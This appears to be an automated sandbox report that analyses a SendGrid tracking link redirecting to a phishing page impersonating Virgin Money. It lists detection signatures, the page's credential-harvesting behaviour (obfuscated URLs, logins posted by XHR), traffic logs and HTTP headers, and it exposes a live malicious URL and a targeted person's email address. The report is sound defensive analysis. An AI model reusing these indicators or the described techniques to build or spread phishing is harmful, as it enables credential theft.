Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM

Overview

General Information

Sample URL:https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bq
Analysis ID:1571048
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 2188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,17134630784947432504,9666418931932445698,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comJoe Sandbox AI: Score: 9 Reasons: The brand 'VirginMoney' is well-known and typically associated with the domain 'virginmoney.com'., The provided URL 'proficocap.com' does not match the legitimate domain for Virgin Money., The URL 'proficocap.com' does not contain any recognizable association with Virgin Money., The email input field suggests a connection to Virgin Money, but the domain does not support this association., The URL does not contain any obvious misspellings or suspicious characters, but the lack of brand association is concerning. DOM: 2.4.pages.csv
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comJoe Sandbox AI: Score: 9 Reasons: The brand 'Virgin Money' is a well-known financial services company., The URL 'proficocap.com' does not match the legitimate domain 'virginmoney.com'., The domain 'proficocap.com' does not have any known association with Virgin Money., The email input field uses a legitimate Virgin Money domain, which could be used to deceive users into thinking the site is legitimate., The URL 'proficocap.com' does not contain any direct reference to Virgin Money, which is suspicious. DOM: 2.5.pages.csv
    Source: Yara matchFile source: 2.5.pages.csv, type: HTML
    Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://proficocap.com/#grant.ramsden@virginmoney.... Script shows multiple suspicious behaviors: 1) Uses base64 encoded URLs (obfuscation), 2) Collects login credentials via XHR POST, 3) Processes email/password data from URL hash, 4) Makes requests to multiple external domains for images/logos which could be used for data exfiltration. The pattern matches common phishing page behaviors where legitimate-looking UI elements are used to harvest credentials.
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: Number of links: 0
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://proficocap.com/?__cf_chl_rt_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQ#grant.ramsden@virginmoney.comHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: Title: does not match URL
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: <input type="password" .../> found
    Source: https://proficocap.com/?__cf_chl_rt_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQ#grant.ramsden@virginmoney.comHTTP Parser: No favicon
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No favicon
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No favicon
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No <meta name="author".. found
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No <meta name="author".. found
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No <meta name="copyright".. found
    Source: https://proficocap.com/#grant.ramsden@virginmoney.comHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.147.8:443 -> 192.168.2.4:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49793 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49795 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.4:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49814 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49810 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49812 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49811 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: u48644047.ct.sendgrid.net to https://proficocap.com/#grant.ramsden@virginmoney.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: u48644047.ct.sendgrid.net to https://proficocap.com/#grant.ramsden@virginmoney.com
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.67
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.67
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.8
    Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D HTTP/1.1Host: u48644047.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: proficocap.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D HTTP/1.1Host: u48644047.ct.sendgrid.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: proficocap.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1pHf3xNPNeTPsur&MD=9ymk1AwG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405 HTTP/1.1Host: proficocap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://proficocap.com/?__cf_chl_rt_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://proficocap.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405 HTTP/1.1Host: proficocap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: proficocap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proficocap.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1Host: proficocap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8eef4911a8e143cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8eef4911a8e143cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8eef4911a8e143cb/1733687444189/f6217f608b824ca04203a9dc66ad631785a35b06ac7270e998d764984692a685/R9JS_IJzkoaUp51 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8eef4911a8e143cb/1733687444189/TpwymHuahAs5EpN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8eef4911a8e143cb/1733687444189/TpwymHuahAs5EpN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
